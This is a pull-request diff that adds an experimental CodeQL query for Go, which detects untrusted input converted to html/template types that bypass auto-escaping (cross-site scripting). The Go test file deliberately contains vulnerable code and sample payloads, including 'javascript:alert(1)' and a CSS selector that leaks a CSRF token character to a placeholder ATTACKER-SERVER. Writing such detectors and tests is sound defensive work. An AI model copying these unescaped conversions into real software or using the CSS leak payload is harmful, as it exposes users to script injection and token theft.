-| HTMLTemplateEscapingPassthrough.go:51:44:51:44 | d | HTMLTemplateEscapingPassthrough.go:50:23:50:55 | call to source : string | HTMLTemplateEscapingPassthrough.go:51:44:51:44 | d | Data from an $@ will not be auto-escaped because it was $@ to template.JS | HTMLTemplateEscapingPassthrough.go:50:23:50:55 | call to source | untrusted source | HTMLTemplateEscapingPassthrough.go:50:11:50:56 | type conversion | converted |
-| HTMLTemplateEscapingPassthrough.go:55:44:55:44 | e | HTMLTemplateEscapingPassthrough.go:54:26:54:56 | call to source : string | HTMLTemplateEscapingPassthrough.go:55:44:55:44 | e | Data from an $@ will not be auto-escaped because it was $@ to template.JSStr | HTMLTemplateEscapingPassthrough.go:54:26:54:56 | call to source | untrusted source | HTMLTemplateEscapingPassthrough.go:54:11:54:57 | type conversion | converted |
-| HTMLTemplateEscapingPassthrough.go:59:38:59:38 | b | HTMLTemplateEscapingPassthrough.go:58:24:58:116 | call to source : string | HTMLTemplateEscapingPassthrough.go:59:38:59:38 | b | Data from an $@ will not be auto-escaped because it was $@ to template.CSS | HTMLTemplateEscapingPassthrough.go:58:24:58:116 | call to source | untrusted source | HTMLTemplateEscapingPassthrough.go:58:11:58:117 | type conversion | converted |
-| HTMLTemplateEscapingPassthrough.go:63:44:63:44 | f | HTMLTemplateEscapingPassthrough.go:62:27:62:49 | call to source : string | HTMLTemplateEscapingPassthrough.go:63:44:63:44 | f | Data from an $@ will not be auto-escaped because it was $@ to template.Srcset | HTMLTemplateEscapingPassthrough.go:62:27:62:49 | call to source | untrusted source | HTMLTemplateEscapingPassthrough.go:62:11:62:50 | type conversion | converted |
-| HTMLTemplateEscapingPassthrough.go:67:38:67:38 | g | HTMLTemplateEscapingPassthrough.go:66:24:66:52 | call to source : string | HTMLTemplateEscapingPassthrough.go:67:38:67:38 | g | Data from an $@ will not be auto-escaped because it was $@ to template.URL | HTMLTemplateEscapingPassthrough.go:66:24:66:52 | call to source | untrusted source | HTMLTemplateEscapingPassthrough.go:66:11:66:53 | type conversion | converted |
+| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion | converted |
+| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion | converted |
+| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | HTMLTemplateEscapingPassthrough.go:39:19:39:33 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:39:19:39:33 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion | converted |
+| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | HTMLTemplateEscapingPassthrough.go:45:29:45:43 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | Data from an $@ will not be auto-escaped because it was $@ to template.HTMLAttr | HTMLTemplateEscapingPassthrough.go:45:29:45:43 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion | converted |
+| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | HTMLTemplateEscapingPassthrough.go:49:23:49:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | Data from an $@ will not be auto-escaped because it was $@ to template.JS | HTMLTemplateEscapingPassthrough.go:49:23:49:37 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion | converted |
+| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | HTMLTemplateEscapingPassthrough.go:53:26:53:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | Data from an $@ will not be auto-escaped because it was $@ to template.JSStr | HTMLTemplateEscapingPassthrough.go:53:26:53:40 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion | converted |
+| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | HTMLTemplateEscapingPassthrough.go:57:24:57:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | Data from an $@ will not be auto-escaped because it was $@ to template.CSS | HTMLTemplateEscapingPassthrough.go:57:24:57:38 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion | converted |
+| HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | HTMLTemplateEscapingPassthrough.go:61:27:61:41 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f | Data from an $@ will not be auto-escaped because it was $@ to template.Srcset | HTMLTemplateEscapingPassthrough.go:61:27:61:41 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion | converted |
+| HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g | Data from an $@ will not be auto-escaped because it was $@ to template.URL | HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion | converted |

--- a/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.expected
+++ b/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.expected
@@ -1,0 +1,87 @@
+edges
+| HTMLTemplateEscapingPassthrough.go:29:12:29:66 | type conversion : string | HTMLTemplateEscapingPassthrough.go:30:39:30:39 | a |
+| HTMLTemplateEscapingPassthrough.go:29:26:29:65 | call to source : string | HTMLTemplateEscapingPassthrough.go:29:12:29:66 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:29:26:29:65 | call to source : string | HTMLTemplateEscapingPassthrough.go:29:12:29:66 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:35:9:35:63 | type conversion : string | HTMLTemplateEscapingPassthrough.go:36:40:36:40 | a |
+| HTMLTemplateEscapingPassthrough.go:35:23:35:62 | call to source : string | HTMLTemplateEscapingPassthrough.go:35:9:35:63 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:35:23:35:62 | call to source : string | HTMLTemplateEscapingPassthrough.go:35:9:35:63 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:40:9:40:59 | type conversion : string | HTMLTemplateEscapingPassthrough.go:41:40:41:40 | a |
+| HTMLTemplateEscapingPassthrough.go:40:19:40:58 | call to source : string | HTMLTemplateEscapingPassthrough.go:40:9:40:59 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:40:19:40:58 | call to source : string | HTMLTemplateEscapingPassthrough.go:40:9:40:59 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:46:11:46:65 | type conversion : string | HTMLTemplateEscapingPassthrough.go:47:41:47:41 | c |
+| HTMLTemplateEscapingPassthrough.go:46:29:46:64 | call to source : string | HTMLTemplateEscapingPassthrough.go:46:11:46:65 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:46:29:46:64 | call to source : string | HTMLTemplateEscapingPassthrough.go:46:11:46:65 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:50:11:50:56 | type conversion : string | HTMLTemplateEscapingPassthrough.go:51:44:51:44 | d |
+| HTMLTemplateEscapingPassthrough.go:50:23:50:55 | call to source : string | HTMLTemplateEscapingPassthrough.go:50:11:50:56 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:50:23:50:55 | call to source : string | HTMLTemplateEscapingPassthrough.go:50:11:50:56 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:54:11:54:57 | type conversion : string | HTMLTemplateEscapingPassthrough.go:55:44:55:44 | e |
+| HTMLTemplateEscapingPassthrough.go:54:26:54:56 | call to source : string | HTMLTemplateEscapingPassthrough.go:54:11:54:57 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:54:26:54:56 | call to source : string | HTMLTemplateEscapingPassthrough.go:54:11:54:57 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:58:11:58:117 | type conversion : string | HTMLTemplateEscapingPassthrough.go:59:38:59:38 | b |
+| HTMLTemplateEscapingPassthrough.go:58:24:58:116 | call to source : string | HTMLTemplateEscapingPassthrough.go:58:11:58:117 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:58:24:58:116 | call to source : string | HTMLTemplateEscapingPassthrough.go:58:11:58:117 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:62:11:62:50 | type conversion : string | HTMLTemplateEscapingPassthrough.go:63:44:63:44 | f |
+| HTMLTemplateEscapingPassthrough.go:62:27:62:49 | call to source : string | HTMLTemplateEscapingPassthrough.go:62:11:62:50 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:62:27:62:49 | call to source : string | HTMLTemplateEscapingPassthrough.go:62:11:62:50 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:66:11:66:53 | type conversion : string | HTMLTemplateEscapingPassthrough.go:67:38:67:38 | g |
+| HTMLTemplateEscapingPassthrough.go:66:24:66:52 | call to source : string | HTMLTemplateEscapingPassthrough.go:66:11:66:53 | type conversion |
+| HTMLTemplateEscapingPassthrough.go:66:24:66:52 | call to source : string | HTMLTemplateEscapingPassthrough.go:66:11:66:53 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:75:16:75:55 | call to source : string | HTMLTemplateEscapingPassthrough.go:76:38:76:43 | caught |
+nodes
+| HTMLTemplateEscapingPassthrough.go:29:12:29:66 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:29:12:29:66 | type conversion : string | semmle.label | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:29:26:29:65 | call to source : string | semmle.label | call to source : string |
+| HTMLTemplateEscapingPassthrough.go:29:26:29:65 | call to source : string | semmle.label | call to source : string |
+| HTMLTemplateEscapingPassthrough.go:30:39:30:39 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:35:9:35:63 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:35:9:35:63 | type conversion : string | semmle.label | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:35:23:35:62 | call to source : string | semmle.label | call to source : string |
+| HTMLTemplateEscapingPassthrough.go:35:23:35:62 | call to source : string | semmle.label | call to source : string |
+| HTMLTemplateEscapingPassthrough.go:36:40:36:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:40:9:40:59 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:40:9:40:59 | type conversion : string | semmle.label | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:40:19:40:58 | call to source : string | semmle.label | call to source : string |
+| HTMLTemplateEscapingPassthrough.go:40:19:40:58 | call to source : string | semmle.label | call to source : string |
+| HTMLTemplateEscapingPassthrough.go:41:40:41:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:46:11:46:65 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:46:11:46:65 | type conversion : string | semmle.label | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:46:29:46:64 | call to source : string | semmle.label | call to source : string |
+| HTMLTemplateEscapingPassthrough.go:46:29:46:64 | call to source : string | semmle.label | call to source : string |
+| HTMLTemplateEscapingPassthrough.go:47:41:47:41 | c | semmle.label | c |
+| HTMLTemplateEscapingPassthrough.go:50:11:50:56 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:50:11:50:56 | type conversion : string | semmle.label | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:50:23:50:55 | call to source : string | semmle.label | call to source : string |
+| HTMLTemplateEscapingPassthrough.go:50:23:50:55 | call to source : string | semmle.label | call to source : string |
+| HTMLTemplateEscapingPassthrough.go:51:44:51:44 | d | semmle.label | d |
+| HTMLTemplateEscapingPassthrough.go:54:11:54:57 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:54:11:54:57 | type conversion : string | semmle.label | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:54:26:54:56 | call to source : string | semmle.label | call to source : string |
+| HTMLTemplateEscapingPassthrough.go:54:26:54:56 | call to source : string | semmle.label | call to source : string |
+| HTMLTemplateEscapingPassthrough.go:55:44:55:44 | e | semmle.label | e |
+| HTMLTemplateEscapingPassthrough.go:58:11:58:117 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:58:11:58:117 | type conversion : string | semmle.label | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:58:24:58:116 | call to source : string | semmle.label | call to source : string |
+| HTMLTemplateEscapingPassthrough.go:58:24:58:116 | call to source : string | semmle.label | call to source : string |
+| HTMLTemplateEscapingPassthrough.go:59:38:59:38 | b | semmle.label | b |
+| HTMLTemplateEscapingPassthrough.go:62:11:62:50 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:62:11:62:50 | type conversion : string | semmle.label | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:62:27:62:49 | call to source : string | semmle.label | call to source : string |
+| HTMLTemplateEscapingPassthrough.go:62:27:62:49 | call to source : string | semmle.label | call to source : string |
+| HTMLTemplateEscapingPassthrough.go:63:44:63:44 | f | semmle.label | f |
+| HTMLTemplateEscapingPassthrough.go:66:11:66:53 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:66:11:66:53 | type conversion : string | semmle.label | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:66:24:66:52 | call to source : string | semmle.label | call to source : string |
+| HTMLTemplateEscapingPassthrough.go:66:24:66:52 | call to source : string | semmle.label | call to source : string |
+| HTMLTemplateEscapingPassthrough.go:67:38:67:38 | g | semmle.label | g |
+| HTMLTemplateEscapingPassthrough.go:75:16:75:55 | call to source : string | semmle.label | call to source : string |
+| HTMLTemplateEscapingPassthrough.go:76:38:76:43 | caught | semmle.label | caught |
+#select
+| HTMLTemplateEscapingPassthrough.go:30:39:30:39 | a | HTMLTemplateEscapingPassthrough.go:29:26:29:65 | call to source : string | HTMLTemplateEscapingPassthrough.go:30:39:30:39 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:29:26:29:65 | call to source | untrusted source | HTMLTemplateEscapingPassthrough.go:29:12:29:66 | type conversion | converted |
+| HTMLTemplateEscapingPassthrough.go:36:40:36:40 | a | HTMLTemplateEscapingPassthrough.go:35:23:35:62 | call to source : string | HTMLTemplateEscapingPassthrough.go:36:40:36:40 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:35:23:35:62 | call to source | untrusted source | HTMLTemplateEscapingPassthrough.go:35:9:35:63 | type conversion | converted |
+| HTMLTemplateEscapingPassthrough.go:41:40:41:40 | a | HTMLTemplateEscapingPassthrough.go:40:19:40:58 | call to source : string | HTMLTemplateEscapingPassthrough.go:41:40:41:40 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:40:19:40:58 | call to source | untrusted source | HTMLTemplateEscapingPassthrough.go:40:9:40:59 | type conversion | converted |
+| HTMLTemplateEscapingPassthrough.go:47:41:47:41 | c | HTMLTemplateEscapingPassthrough.go:46:29:46:64 | call to source : string | HTMLTemplateEscapingPassthrough.go:47:41:47:41 | c | Data from an $@ will not be auto-escaped because it was $@ to template.HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:29:46:64 | call to source | untrusted source | HTMLTemplateEscapingPassthrough.go:46:11:46:65 | type conversion | converted |
+| HTMLTemplateEscapingPassthrough.go:51:44:51:44 | d | HTMLTemplateEscapingPassthrough.go:50:23:50:55 | call to source : string | HTMLTemplateEscapingPassthrough.go:51:44:51:44 | d | Data from an $@ will not be auto-escaped because it was $@ to template.JS | HTMLTemplateEscapingPassthrough.go:50:23:50:55 | call to source | untrusted source | HTMLTemplateEscapingPassthrough.go:50:11:50:56 | type conversion | converted |
+| HTMLTemplateEscapingPassthrough.go:55:44:55:44 | e | HTMLTemplateEscapingPassthrough.go:54:26:54:56 | call to source : string | HTMLTemplateEscapingPassthrough.go:55:44:55:44 | e | Data from an $@ will not be auto-escaped because it was $@ to template.JSStr | HTMLTemplateEscapingPassthrough.go:54:26:54:56 | call to source | untrusted source | HTMLTemplateEscapingPassthrough.go:54:11:54:57 | type conversion | converted |
+| HTMLTemplateEscapingPassthrough.go:59:38:59:38 | b | HTMLTemplateEscapingPassthrough.go:58:24:58:116 | call to source : string | HTMLTemplateEscapingPassthrough.go:59:38:59:38 | b | Data from an $@ will not be auto-escaped because it was $@ to template.CSS | HTMLTemplateEscapingPassthrough.go:58:24:58:116 | call to source | untrusted source | HTMLTemplateEscapingPassthrough.go:58:11:58:117 | type conversion | converted |
+| HTMLTemplateEscapingPassthrough.go:63:44:63:44 | f | HTMLTemplateEscapingPassthrough.go:62:27:62:49 | call to source : string | HTMLTemplateEscapingPassthrough.go:63:44:63:44 | f | Data from an $@ will not be auto-escaped because it was $@ to template.Srcset | HTMLTemplateEscapingPassthrough.go:62:27:62:49 | call to source | untrusted source | HTMLTemplateEscapingPassthrough.go:62:11:62:50 | type conversion | converted |
+| HTMLTemplateEscapingPassthrough.go:67:38:67:38 | g | HTMLTemplateEscapingPassthrough.go:66:24:66:52 | call to source : string | HTMLTemplateEscapingPassthrough.go:67:38:67:38 | g | Data from an $@ will not be auto-escaped because it was $@ to template.URL | HTMLTemplateEscapingPassthrough.go:66:24:66:52 | call to source | untrusted source | HTMLTemplateEscapingPassthrough.go:66:11:66:53 | type conversion | converted |

--- a/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.go
+++ b/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.go
@@ -1,0 +1,78 @@
+package main
+
+import (
+	"html/template"
+	"os"
+)
+
+func main() {}
+func source(s string) string {
+	return s
+}
+func checkError(err error) {
+	if err != nil {
+		panic(err)
+	}
+}
+
+type HTMLAlias = template.HTML
+
+// bad is an example of a bad implementation
+func bad() {
+	tmpl, _ := template.New("test").Parse(`Hi {{.}}\n`)
+	tmplTag, _ := template.New("test").Parse(`Hi <b {{.}}></b>\n`)
+	tmplScript, _ := template.New("test").Parse(`<script> eval({{.}}) </script>`)
+	tmplSrcset, _ := template.New("test").Parse(`<img srcset="{{.}}"/>`)
+
+	{
+		{
+			var a = template.HTML(source(`<a href='example.com'>link</a>`))
+			checkError(tmpl.Execute(os.Stdout, a))
+		}
+		{
+			{
+				var a template.HTML
+				a = template.HTML(source(`<a href='example.com'>link</a>`))
+				checkError(tmpl.Execute(os.Stdout, a))
+			}
+			{
+				var a HTMLAlias
+				a = HTMLAlias(source(`<a href='example.com'>link</a>`))
+				checkError(tmpl.Execute(os.Stdout, a))
+			}
+		}
+	}
+	{
+		var c = template.HTMLAttr(source(`href="https://example.com"`))
+		checkError(tmplTag.Execute(os.Stdout, c))
+	}
+	{
+		var d = template.JS(source("alert({hello: 'world'})"))
+		checkError(tmplScript.Execute(os.Stdout, d))
+	}
+	{
+		var e = template.JSStr(source("setTimeout('alert()')"))
+		checkError(tmplScript.Execute(os.Stdout, e))
+	}
+	{
+		var b = template.CSS(source("input[name='csrftoken'][value^='b'] { background: url(//ATTACKER-SERVER/leak/b); } "))
+		checkError(tmpl.Execute(os.Stdout, b))
+	}
+	{
+		var f = template.Srcset(source(`evil.jpg 320w`))
+		checkError(tmplSrcset.Execute(os.Stdout, f))
+	}
+	{
+		var g = template.URL(source("javascript:alert(1)"))
+		checkError(tmpl.Execute(os.Stdout, g))
+	}
+}
+
+// good is an example of a good implementation
+func good() {
+	tmpl, _ := template.New("test").Parse(`Hello, {{.}}\n`)
+	{ // This will be escaped:
+		var caught = source(`<a href="example.com">link</a>`)
+		checkError(tmpl.Execute(os.Stdout, caught))
+	}
+}

--- a/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.go
+++ b/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.go
@@ -71,13 +71,13 @@ func bad(req *http.Request) {
 func good(req *http.Request) {
 	tmpl, _ := template.New("test").Parse(`Hello, {{.}}\n`)
 	{ // This will be escaped, so it shoud NOT be caught:
-		var escaped = source(`<a href="example.com">link</a>`)
+		var escaped = req.UserAgent()
 		checkError(tmpl.Execute(os.Stdout, escaped))
 	}
 	{
 		// The converted source value does NOT flow to tmpl.Exec,
 		// so this should NOT be caught.
-		src := source(`<a href='example.com'>link</a>`)
+		src := req.UserAgent()
 		converted := template.HTML(src)
 		_ = converted
 		checkError(tmpl.Execute(os.Stdout, src))

--- a/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.go
+++ b/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.go
@@ -82,4 +82,12 @@ func good(req *http.Request) {
 		_ = converted
 		checkError(tmpl.Execute(os.Stdout, src))
 	}
+	{
+		// The untrusted input is sanitized before use.
+		tmpl, _ := template.New("test").Parse(`<div>Your user agent is {{.}}</div>`)
+		src := req.UserAgent()
+
+		converted := template.HTML("<b>" + template.HTMLEscapeString(src) + "</b>")
+		checkError(tmpl.Execute(os.Stdout, converted))
+	}
 }

--- a/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.go
+++ b/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.go
@@ -70,8 +70,16 @@ func bad(req *http.Request) {
 // good is an example of a good implementation
 func good(req *http.Request) {
 	tmpl, _ := template.New("test").Parse(`Hello, {{.}}\n`)
-	{ // This will be escaped:
-		var caught = req.UserAgent()
-		checkError(tmpl.Execute(os.Stdout, caught))
+	{ // This will be escaped, so it shoud NOT be caught:
+		var escaped = source(`<a href="example.com">link</a>`)
+		checkError(tmpl.Execute(os.Stdout, escaped))
+	}
+	{
+		// The converted source value does NOT flow to tmpl.Exec,
+		// so this should NOT be caught.
+		src := source(`<a href='example.com'>link</a>`)
+		converted := template.HTML(src)
+		_ = converted
+		checkError(tmpl.Execute(os.Stdout, src))
 	}
 }

--- a/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.qlref
+++ b/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.qlref
@@ -1,0 +1,1 @@
+experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql


### PR DESCRIPTION
This PR adds a new experimental query regarding [CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')](https://cwe.mitre.org/data/definitions/79.html), and more specifically the cases when user-values are converted to types that allow completely avoiding the escaping that normally values would undergo in the HTML template execution.

Usage of such types on user-provided values leads to XSS.